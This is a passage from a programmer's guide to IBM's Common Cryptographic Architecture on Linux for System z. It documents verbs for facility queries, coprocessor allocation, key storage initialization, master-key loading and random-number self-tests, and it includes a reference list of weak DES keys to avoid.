+Hashpatternfield. +SYM_OMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeyoldmaster-keyregister, +calculatedusingtheMDC4algorithm. +SYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_CMK_MDC4_ID 2 X'0F01' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +SYM_CMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeycurrentmaster-key +register,calculatedusingtheMDC4algorithm. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 81 + +Cryptographic Facility Query (CSUACFQ) +Table15.OutputdataformatforSTATICSXoperationalkeyparts (continued) +Lengthin Field +Fieldname bytes value Description +SYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +SYM_NMK_MDC4_ID 2 X'0F00' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +SYM_NMK_MDC4_HP 16 variable HashpatternovertheSymmetricKeynewmaster-keyregister, +calculatedusingtheMDC4algorithm. +ASYM_OMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_OMK_MDC4_ID 2 X'0F05' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_OMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeyoldmaster-keyregister, +calculatedusingtheMDC4algorithm. +ASYM_CMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_CMK_MDC4_ID 2 X'0F04' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_CMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeycurrentmaster-key +register,calculatedusingtheMDC4algorithm. +ASYM_NMK_MDC4_LEN 2 20 LengthinbytesofthisHashpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheHashpattern). +ASYM_NMK_MDC4_ID 2 X'0F03' Hexadecimalidentifierindicatingthecontentsofthefollowing +Hashpatternfield. +ASYM_NMK_MDC4_HP 16 variable HashpatternovertheAsymmetricKeynewmaster-keyregister, +calculatedusingtheMDC4algorithm. +SYM_OMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_OMK_VP_ID 2 X'0F08' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_OMK_VP 8 variable VerificationpatternovertheSymmetricKeyoldmaster-key +registercalculatedusingthedefaultalgorithm. +SYM_CMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_CMK_VP_ID 2 X'0F07' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +SYM_CMK_VP 8 variable VerificationpatternovertheSymmetricKeycurrentmaster-key +register,calculatedusingthedefaultalgorithm. +SYM_NMK_VP_LEN 2 12 LengthinbytesofthisVerificationpatternblockintheverb_data +(comprisingthislengthfield,thefollowingIDfield,andthefield +fortheVerificationpattern). +SYM_NMK_VP_ID 2 X'0F06' Hexadecimalidentifierindicatingthecontentsofthefollowing +Verificationpatternfield. +82 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Query (CSUACFQ) +Table15.OutputdataformatforSTATICSXoperationalkeyparts (continued) +Lengthin Field +Fieldname bytes value Description +SYM_NMK_VP 8 variable VerificationpatternovertheSymmetricKeynewmaster-key +register,calculatedusingthedefaultalgorithm. +Totalbytecount 156 +Restrictions +You cannot limit the number of returned rule_array elements. Table10 on page 61 describes the number +and meaning of the information in output rule_array elements. +Tip: Allocate a minimum of 30 rule_array elements to allow for extensions of the returned information. +Required commands +None +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSUACFQJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSUACFQJ are shown here. +Format +public native void CSUACFQJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger verb_data_length, +byte[] verb_data +); +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 83 + +Cryptographic Facility Version (CSUACFV) +Cryptographic Facility Version (CSUACFV) +The Cryptographic Facility Version verb is used to retrieve information about the SecurityApplication +Program Interface (SAPI) Version and the SecurityApplication Program Interface build date. In the same +format as the Cryptographic Facility Query (CSUACFQ) verb returns for the CCAapplication with the +STATCCArule_array option. +This verb returns information elements in the version_data variable. +Format +CSUACFV( +return_code, +reason_code, +exit_data_length, +exit_data, +version_data_length, +version_data ) +Parameters +Note that there is no rule_array keyword. +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +version_data_length +Direction: Input/Output Type: Integer +The version_data_length parameter is a pointer to an integer variable containing the number of bytes +in the version data variable. This value must be a minimum of 17 bytes. On input, the +version_data_length variable must be set to the total size of the variable pointed to by the +version_data parameter. On output, this variable contains the number of bytes of data returned by the +verb in the version_data variable. +version_data +Direction: Output Type: String +The version_data parameter is a pointer to a string variable containing data returned by the verb.An +8-byte character string identifies the version of the SecurityApplication Program Interface (SAPI) +library, followed by an 8-byte character string containing the build date for the SAPI library, followed by +a null terminating character. The build date is in the format: yyyymmdd, where yyyy is the year, mm is +the month, and dd is the day of the month. +Restrictions +None +Required commands +None +Usage notes +None +84 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Facility Version (CSUACFV) +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSUACFVJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSUACFVJ are shown here. +Format +public native void CSUACFVJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger version_data_length, +byte[] version_data +); +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 85 + +Cryptographic Resource Allocate (CSUACRA) +Cryptographic Resource Allocate (CSUACRA) +The Cryptographic ResourceAllocate verb is used to allocate a specific CCAcoprocessor for use by the +thread or process, depending on the scope of the verb. This verb is scoped to a thread. When a thread or +process, depending on the scope, allocates a cryptographic resource, requests are routed to that resource. +When a cryptographic resource is not allocated, requests are routed to the default cryptographic resource. +You can set the default cryptographic resource. If you take no action, the default assignment is CRP01. +You cannot allocate a cryptographic resource while one is already allocated. Use the Cryptographic +Resource Deallocate verb (see “Cryptographic Resource Deallocate (CSUACRD)” on page 88) to +deallocate an allocated cryptographic resource. +Be sure to review “Multi-coprocessor capabilities” on page 31. +Format +CSUACRA( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +resource_name_length, +resource_name ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type:Array +The rule_array parameter is a pointer to a string variable containing an array of keywords. The +keywords are eight bytes in length and must be left-aligned and padded on the right with space +characters. The rule_array keyword is described in Table16. +Table16.KeywordsforCryptographicResourceAllocatecontrolinformation +Keyword Description +Cryptographicresource(Required) +DEVICE SpecifiesaCEX3Ccoprocessor. +HCPUACLR SpecifiestheuseofhostCPUassistforclearkeys.Thiskeywordenablesclearkeyuseof +theCPACF,forclearkeyAESencryptionanddecryptionwithhashalgorithms:SHA-1, +SHA-224,SHA-256,SHA-384,andSHA-512.Thisisthedefaultstateatthetimeofthefirst +useoftheCCAlibrarybyaPIDorTID. +HCPUAPRT SpecifiestheuseofhostCPUassistforprotectedkeys.Thiskeywordenablesprotected +keyuseoftheCPACFforprotectedkeyAESandDES,TDES,andMAC.Thisisnotthe +defaultstateatthetimeofthefirstuseoftheCCAlibrarybyaPIDorTID. +86 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Resource Allocate (CSUACRA) +There are environment variable that also impacts default card, CSU_DEFAULT_ADAPTER (see +“Multi-coprocessor capabilities” on page 31, and environment variables that influence CPACF support +(see “Environment variables that affect CPACF usage” on page 8). +The actual hardware configuration determines what features are available, and CCAwill use what +exists if the user sets these values as desired, with respect to appropriate defaults. +resource_name_length +Direction: Input Type: Integer +The resource_name_length parameter is a pointer to an integer variable containing the number of +bytes of data in the resource-name variable. The length must be 1 - 64. +resource_name +Direction: Input Type: String +The resource_name parameter is a pointer to a string variable containing the name of the coprocessor +to be allocated. +Restrictions +None +Required commands +None. +Usage notes +For optimal performance, ensure that you have enabled CPACF in the thread doing the processing, by +making a quick call on the host side at thread startup time, to Cryptographic ResourceAllocate, specifying +the correct HCPUACLR and HCPUAPRT keyword values for your operation. See the Cryptographic +ResourceAllocate rule_array keyword definitions, and see “Access control points that affect CPACF +protected key operations” on page 9 for more affected verbs. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSUACRAJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSUACRAJ are shown here. +Format +public native void CSUACRAJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_lengthh, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger resource_name_length, +byte[] resource_name +); +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 87 + +Cryptographic Resource Deallocate (CSUACRD) +Cryptographic Resource Deallocate (CSUACRD) +The Cryptographic Resource Deallocate verb is used to deallocate a specific CCAcoprocessor that is +allocated by the thread or process, depending on the scope of the verb. This verb is scoped to a thread. +When a thread or process, depending on the scope, de-allocates a cryptographic resource, requests are +routed to the default cryptographic resource. +You can set the default cryptographic resource. If you take no action, the default assignment is CRP01. +If a thread with an allocated coprocessor ends without first de-allocating the coprocessor, excess memory +consumption results. It is not necessary to deallocate a cryptographic resource if the process itself is +ending, only if individual threads end while the process continues to run. +Be sure to review “Multi-coprocessor capabilities” on page 31. +Format +CSUACRD( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count +rule_array, +resource_name_length, +resource_name ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type:Array +The rule_array parameter is a pointer to a string variable containing an array of keywords. The +keywords are eight bytes in length and must be left-aligned and padded on the right with space +characters. The rule_array keyword is described in Table17. +Table17.KeywordsforCryptographicResourceDeallocatecontrolinformation +Keyword Description +Cryptographicresource(Required) +DEVICE SpecifiesaCEX3CCoprocessor. +HCPUACLR SpecifiestheuseofhostCPUassistforclearkeys.Thiskeywordenablesclearkeyuse +oftheCPACF,forclearkeyAESencryptionanddecryptionwithhashalgorithms:SHA-1, +SHA-224,SHA-256,SHA-384,andSHA-512.Thisisthedefaultstateatthetimeofthe +firstuseoftheCCAlibrarybyaPIDorTID. +HCPUAPRT SpecifiestheuseofhostCPUassistforprotectedkeys.Thiskeyworddisablesprotected +keyuseoftheCPACFforprotectedkeyAESandDES,TDES,andMAC.Thisisthe +defaultstateatthetimeofthefirstuseoftheCCAlibrarybyaPIDorTID. +88 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Cryptographic Resource Deallocate (CSUACRD) +There are environment variable that also impacts default card, CSU_DEFAULT_ADAPTER (see +“Multi-coprocessor capabilities” on page 31, and environment variables that influence CPACF support +(see “Environment variables that affect CPACF usage” on page 8). +The actual hardware configuration determines what features are available, and CCAwill use what +exists if the user sets these values as desired, with respect to appropriate defaults. +resource_name_length +Direction: Input Type: Integer +The resource_name_length parameter is a pointer to an integer variable containing the number of +bytes of data in the resource_name variable. The length must be 1 - 64. +resource_name +Direction: Input Type: String +The resource_name parameter is a pointer to a string variable containing the name of the coprocessor +to be deallocated. +Restrictions +None +Required commands +None +Usage notes +To disable CPACF usage in your processing thread, make a call to Cryptographic Resource Deallocate, +specifying the correct HCPUACLR and HCPUAPRT keyword as appropriate. See the Cryptographic +Resource Deallocate rule_array keyword definitions, and see “Access control points that affect CPACF +protected key operations” on page 9 for more affected verbs. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSUACRDJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSUACRDJ are shown here. +Format +public native void CSUACRDJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger resource_name_length, +byte[] resource_name); +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 89 + +Key Storage Initialization (CSNBKSI) +Key Storage Initialization (CSNBKSI) +The Key Storage Initialization verb initializes a key-storage file using the current symmetric or asymmetric +master-key. The initialized key storage file does not contain any preexisting key records. The key storage +data and index files are in the /opt/IBM/CEX3C/keys directory. +| The key storage functions do not work with HMAC keys. +Format +CSNBKSI( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_storage_file_name_length, +key_storage_file_name, +key_storage_description_length, +key_storage_description, +clear_master_key ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 2. +rule_array +Direction: Input Type:Array +The rule_array parameter is a pointer to a string variable containing an array of keywords. The +keywords are eight bytes in length and must be left-aligned and padded on the right with space +characters. The rule_array keywords are described in Table18. +Table18.KeywordsforKeyStorageInitializationcontrolinformation +Keyword Description +Master-keysource(Required) +CURRENT Specifiesthecurrentsymmetricmaster-keyofthe +defaultcryptographicfacilityistobeusedforthe +initialization. +Key-storageselection(Onerequired) +AES InitializeAESkeystorage. +DES InitializeDESkeystorage. +| PKA InitializePKAkeystorage(PKAand,beginningwith +| Release4.1.0,ECCkeytokens). +key_storage_file_name_length +Direction: Input Type: Integer +90 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Storage Initialization (CSNBKSI) +The key_storage_file_name_length parameter is a pointer to an integer variable containing the number +of bytes of data in the key_storage_file_name variable. The length must be within the range of 1 - 64. +key_storage_file_name +Direction: Input Type: String +The key_storage_file_name parameter is a pointer to a string variable containing the fully qualified file +name of the key-storage file to be initialized. If the file does not exist, it is created. If the file does +exist, it is overwritten and all existing keys are lost. +key_storage_description_length +Direction: Input Type: Integer +The key_storage_description_length parameter is a pointer to an integer variable containing the +number of bytes of data in the key_storage_description variable. +key_storage_description +Direction: Input Type: String +The key_storage_description parameter is a pointer to a string variable containing the description +string stored in the key-storage file when it is initialized. +clear_master_key +Direction: Input Type: String +The clear_master_key parameter is unused, but it must be declared and point to 24 data bytes in +application storage. +Restrictions +| ECC and variable-length symmetric key tokens are not supported in releases before Release 4.1.0. +Required commands +| The Key Storage Initialization verb requires the Key Test and Key Test2 command (offset X'001D') to be +| enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKSIJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKSIJ are shown here. +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 91 + +Key Storage Initialization (CSNBKSI) +Format +public native void CSNBKSIJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger filename_length, +byte[] filename, +hikmNativeInteger key_storage_description_length, +byte[] key_storage_description, +byte[] clear_master_key ); +92 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Master Key Process (CSNBMKP) +Master Key Process (CSNBMKP) +The Master Key Process verb operates on the three master-key registers: new, current, and old. Use the +verb to perform the following services: +v Clear the new and clear the old master-key registers. +v Generate a random master-key value in the new master-key register. +v XOR a clear value as a key part into the new master-key register. +v Set the master key, which transfers the current master-key to the old master-key register, and the new +master-key to the current master-key register. It then clears the new master-key register. +You can choose to process either the symmetric or asymmetric registers by specifying the SYM-MK and +the ASYM-MK rule_array keywords. +Tip: Before starting to load new master-key information, ensure the new master-key register is cleared. +Do this by using the CLEAR keyword in the rule_array. +To form a master key from key parts in the new master-key register, use the verb several times to +complete the following tasks: +v Clear the register, if it is not already clear. +v Load the first key part. +v Load any middle key parts, calling the verb once for each middle key part. +v Load the last key part. +v SET or confirm a master key for which the last key part has been loaded into the new master-key +register. +For the SYM-MK, the low-order bit in each byte of the key is used as parity for the remaining bits in the +byte. Each byte of the key part must contain an odd number of one bits. If this is not the case, a warning +is issued. The product maintains odd parity on the accumulated symmetric master-key value. +When the last master key part is entered, this additional processing is performed: +v If any two of the 8-byte parts of the new master-key have the same value, a warning is issued. Do not +ignore this warning. Do not use a key with this property. +v If any of the 8-byte parts of the new master-key compares equal to one of the weak DES-keys, the verb +fails with return code 8, reason code 703. See “Questionable DES keys” on page 95 for a list of these +weak keys.Aparity-adjusted version of the asymmetric master-key is used to look for weak keys. +If anAES, DES or PKAkey storage exists, the header record of each key storage is updated with the +verification pattern of the new, current master-key. +Format +CSNBMKP( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_part ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 93 + +Master Key Process (CSNBMKP) +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1, 2, or 3. +rule_array +Direction: Input Type:Array +FoThe rule_array parameter is a pointer to a string variable containing an array of keywords. The +keywords are eight bytes in length and must be left-aligned and padded on the right with space +characters. The rule_array keywords are described in Table19. +Table19.KeywordsforMasterKeyProcesscontrolinformation +Keyword Description +Cryptographiccomponent(Optional) +ADAPTER Specifiesthecoprocessor.Thisisthedefault. +Masterkeyregisterclass(One,required) +SeeNoteattheendofthistable. +AES-MK SpecifiesoperationwiththeAESmaster-keyregisters. +|| APKA-MK SpecifiesoperationwiththeAPKAmaster-keyregisters.ThiskeywordwasintroducedwithCCA +| 4.1.0. +ASYM-MK Specifiesoperationwiththeasymmetricmaster-keyregisters. +SYM-MK Specifiesoperationwiththesymmetricmaster-keyregisters. +Master-keyprocess(One,required) +CLEAR SpecifiestocleartheNMKregister. +FIRST Specifiestoloadthefirstkey_part. +MIDDLE SpecifiestoXORthesecond,third,orotherintermediatekey_partintotheNMKregister. +LAST SpecifiestoXORthelastkey_partintotheNMKregister. +SET SpecifiestoadvancetheCMKtotheOMKregister,toadvancetheNMKtotheCMKregister,and +tocleartheNMKregister. +Note: Themaster-keyregisterclassisnotoptionalforLinuxonIBMSystemz.Thereisnodefaultforthis +environment.Ifasuitablekeywordisnotspecified,returncode8withreasoncode33willbereturned. +key_part +Direction: Input Type: String +Apointer to a string variable containing a 168-bit or 192-bit clear key-part used when you specify one +of the keywords FIRST, MIDDLE, or LAST. If you use the CLEAR or SET keywords, the information +in the variable is ignored, but you must declare the variable. +Restrictions +General restrictions: +v You must set up the groups for the users who will be loading the master keys to the cards. Each part of +the load process is owned by a different Linux group created by the RPM install procedure, and verified +in the host library implementing theAPI allowing master key processing. To complete a specific step, +the user must have membership in the proper group. See Master key load (Step 7 on page 544). +| v TheAES-MK rule-array keyword is not supported in releases before Release 3.30. +| v TheAPKA-MK rule-array keyword is not supported in releases before Release 4.1.0. +For applications that use this verb: +94 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Master Key Process (CSNBMKP) +v When writing your own application, you must link it with the /usr/lib64/libcsulccamk.so library. +Required commands +This verb requires the following commands to be enabled in the active role based on the master-key class +and master-key operation: +Master-key +operation Master-keyclass Offset Command +| CLEAR AES-MK X'0124' Clear New AES Master Key +| SYM-MK X'0032' Clear New DES Master Key Register +| ASYM-MK X'0060' Clear New RSA Master Key Register +|| APKA-MK X'031F' Clear New ECC Master Key +| FIRST AES-MK X'0125' Load First AES Master Key Part +| SYM-MK X'0018' Load First DES Master Key Part +| ASYM-MK X'0053' Load First RSA Master Key Part +|| APKA-MK X'0320' Load First ECC Master Key Part +| MIDDLEorLAST AES-MK X'0126' Combine AES Master Key Parts +| SYM-MK X'0019' Combine DES Master Key Parts +| ASYM-MK X'0054' Combine RSA Master Key Parts +|| APKA-MK X'0321' Combine ECC Master Key Parts +| SET AES-MK X'0128' Set AES Master Key +| SYM-MK X'001A' Set DES Master Key +| ASYM-MK X'0057' Set RSA Master Key +|| APKA-MK X'0322' Set ECC Master Key +Usage notes +None +Questionable DES keys +These keys are considered questionable DES keys, and so should probably not be used when entering +SYM-MK orASYM-MK master keys. +01 01 01 01 01 01 01 01 /* weak */ +FE FE FE FE FE FE FE FE /* weak */ +1F 1F 1F 1F 0E 0E 0E 0E /* weak */ +E0 E0 E0 E0 F1 F1 F1 F1 /* weak */ +01 FE 01 FE 01 FE 01 FE /* semi-weak */ +FE 01 FE 01 FE 01 FE 01 /* semi-weak */ +1F E0 1F E0 0E F1 0E F1 /* semi-weak */ +E0 1F E0 1F F1 0E F1 0E /* semi-weak */ +01 E0 01 E0 01 F1 01 F1 /* semi-weak */ +E0 01 E0 01 F1 01 F1 01 /* semi-weak */ +1F FE 1F FE 0E FE 0E FE /* semi-weak */ +FE 1F FE 1F FE 0E FE 0E /* semi-weak */ +01 1F 01 1F 01 0E 01 0E /* semi-weak */ +1F 01 1F 01 0E 01 0E 01 /* semi-weak */ +E0 FE E0 FE F1 FE F1 FE /* semi-weak */ +FE E0 FE E0 FE F1 FE F1 /* semi-weak */ +1F 1F 01 01 0E 0E 01 01 /* possibly semi-weak */ +01 1F 1F 01 01 0E 0E 01 /* possibly semi-weak */ +1F 01 01 1F 0E 01 01 0E /* possibly semi-weak */ +01 01 1F 1F 01 01 0E 0E /* possibly semi-weak */ +E0 E0 01 01 F1 F1 01 01 /* possibly semi-weak */ +FE FE 01 01 FE FE 01 01 /* possibly semi-weak */ +FE E0 1F 01 FE F1 0E 01 /* possibly semi-weak */ +E0 FE 1F 01 F1 FE 0E 01 /* possibly semi-weak */ +FE E0 01 1F FE F1 01 0E /* possibly semi-weak */ +E0 FE 01 1F F1 FE 01 0E /* possibly semi-weak */ +E0 E0 1F 1F F1 F1 0E 0E /* possibly semi-weak */ +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 95 + +Master Key Process (CSNBMKP) +FE FE 1F 1F FE FE 0E 0E /* possibly semi-weak */ +FE 1F E0 01 FE 0E F1 01 /* possibly semi-weak */ +E0 1F FE 01 F1 0E FE 01 /* possibly semi-weak */ +FE 01 E0 1F FE 01 F1 0E /* possibly semi-weak */ +E0 01 FE 1F F1 01 FE 0E /* possibly semi-weak */ +01 E0 E0 01 01 F1 F1 01 /* possibly semi-weak */ +1F FE E0 01 0E FE F1 01 /* possibly semi-weak */ +1F E0 FE 01 0E F1 FE 01 /* possibly semi-weak */ +01 FE FE 01 01 FE FE 01 /* possibly semi-weak */ +1F E0 E0 1F 0E F1 F1 0E /* possibly semi-weak */ +01 FE E0 1F 01 FE F1 0E /* possibly semi-weak */ +01 E0 FE 1F 01 F1 FE 0E /* possibly semi-weak */ +1F FE FE 1F 0E FE FE 0E /* possibly semi-weak */ +E0 01 01 E0 F1 01 01 F1 /* possibly semi-weak */ +FE 1F 01 E0 FE 0E 01 F1 /* possibly semi-weak */ +FE 01 1F E0 FE 01 0E F1 /* possibly semi-weak */ +E0 1F 1F E0 F1 0E 0E F1 /* possibly semi-weak */ +FE 01 01 FE FE 01 01 FE /* possibly semi-weak */ +E0 1F 01 FE F1 0E 01 FE /* possibly semi-weak */ +E0 01 1F FE F1 01 0E FE /* possibly semi-weak */ +FE 1F 1F FE FE 0E 0E FE /* possibly semi-weak */ +1F FE 01 E0 E0 FE 01 F1 /* possibly semi-weak */ +01 FE 1F E0 01 FE 0E F1 /* possibly semi-weak */ +1F E0 01 FE 0E F1 01 FE /* possibly semi-weak */ +01 E0 1F FE 01 F1 0E FE /* possibly semi-weak */ +01 01 E0 E0 01 01 F1 F1 /* possibly semi-weak */ +1F 1F E0 E0 0E 0E F1 F1 /* possibly semi-weak */ +1F 01 FE E0 0E 01 FE F1 /* possibly semi-weak */ +01 1F FE E0 01 0E FE F1 /* possibly semi-weak */ +1F 01 E0 FE 0E 01 F1 FE /* possibly semi-weak */ +01 1F E0 FE 01 E0 F1 FE /* possibly semi-weak */ +01 01 FE FE 01 01 FE FE /* possibly semi-weak */ +1F 1F FE FE 0E 0E FE FE /* possibly semi-weak */ +FE FE E0 E0 FE FE F1 F1 /* possibly semi-weak */ +E0 FE FE E0 F1 FE FE F1 /* possibly semi-weak */ +FE E0 E0 FE FE F1 F1 FE /* possibly semi-weak */ +E0 E0 FE FE F1 F1 FE FE /* possibly semi-weak */ +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBMKPJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBMKPJ are shown here. +Format +public native void CSNBMKPJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_part ); +96 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Random Number Tests (CSUARNT) +Random Number Tests (CSUARNT) +The Random Number Tests verb invokes the USANIST FIPS PUB 140-1 specified cryptographic +operational tests. These tests, selected by a rule_array keyword, consist of: +v For random numbers: a monobit test, poker test, runs test, and long-run test +v Known-answer tests of DES, RSA, and SHA-1 processes +The tests are performed three times. If there is any test failure, the verb returns return code 4 and reason +code 1. +Format +CSUARNT( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type:Array +The rule_array parameter is a pointer to a string variable containing an array of keywords. The +keywords are eight bytes in length and must be left-aligned and padded on the right with space +characters. The rule_array keywords are described in Table20. +Table20.KeywordsforRandomNumberTestscontrolinformation +Keyword Description +Testselection(Onerequired) +FIPS-RNT PerformtheFIPS140-1specifiedtestontherandom +numbergenerationoutput. +KAT PerformtheFIPS140-1specifiedknown-answertests +onDES,RSA,andSHA-1. +Restrictions +None +Required commands +None +Chapter4.UsingtheCCAnodesandresourcecontrolverbs 97 + +Random Number Tests (CSUARNT) +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSUARNTJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSUARNTJ are shown here. +Format +public native void CSUARNTJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array); +98 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| +Chapter 5. Managing AES and DES cryptographic keys +| This chapter describes the verbs that generate and maintainAES and DES cryptographic keys. +| Using CCA, you can generate keys using the Key Generate verb. CCAprovides a number of verbs to +| assist you in managing and distributingAES and DES keys, generating random numbers, and maintaining +| the key storage files. +This chapter describes the following verbs: +v “Clear Key Import (CSNBCKI)” on page 100 +v “Control Vector Generate (CSNBCVG)” on page 102 +v “Control Vector Translate (CSNBCVT)” on page 104 +v “Cryptographic Variable Encipher (CSNBCVE)” on page 107 +v “Data Key Export (CSNBDKX)” on page 109 +v “Data Key Import (CSNBDKM)” on page 111 +v “Diversified Key Generate (CSNBDKG)” on page 113 +v “Key Export (CSNBKEX)” on page 117 +v “Key Generate (CSNBKGN)” on page 120 +| v “Key Generate2 (CSNBKGN2)” on page 128 +v “Key Import (CSNBKIM)” on page 133 +v “Key Part Import (CSNBKPI)” on page 136 +| v “Key Part Import2 (CSNBKPI2)” on page 139 +v “Key Test (CSNBKYT)” on page 143 +| v “Key Test2 (CSNBKYT2)” on page 147 +v “Key Test Extended (CSNBKYTX)” on page 150 +v “Key Token Build (CSNBKTB)” on page 155 +| v “Key Token Build2 (CSNBKTB2)” on page 159 +v “Key Token Change (CSNBKTC)” on page 163 +| v “Key Token Change2 (CSNBKTC2)” on page 166 +v “Key Token Parse (CSNBKTP)” on page 169 +v “Key Translate (CSNBKTR)” on page 173 +| v “Key Translate2 (CSNBKTR2)” on page 175 +v “Multiple Clear Key Import (CSNBCKM)” on page 179 +v “PKADecrypt (CSNDPKD)” on page 182 +v “PKAEncrypt (CSNDPKE)” on page 185 +v “Prohibit Export (CSNBPEX)” on page 188 +v “Prohibit Export Extended (CSNBPEXX)” on page 189 +v “Random Number Generate (CSNBRNG)” on page 191 +v “Random Number Generate Long (CSNBRNGL)” on page 193 +| v “Restrict KeyAttribute (CSNBRKA)” on page 195 +v “Symmetric Key Export (CSNDSYX)” on page 198 +v “Symmetric Key Generate (CSNDSYG)” on page 201 +v “Symmetric Key Import (CSNDSYI)” 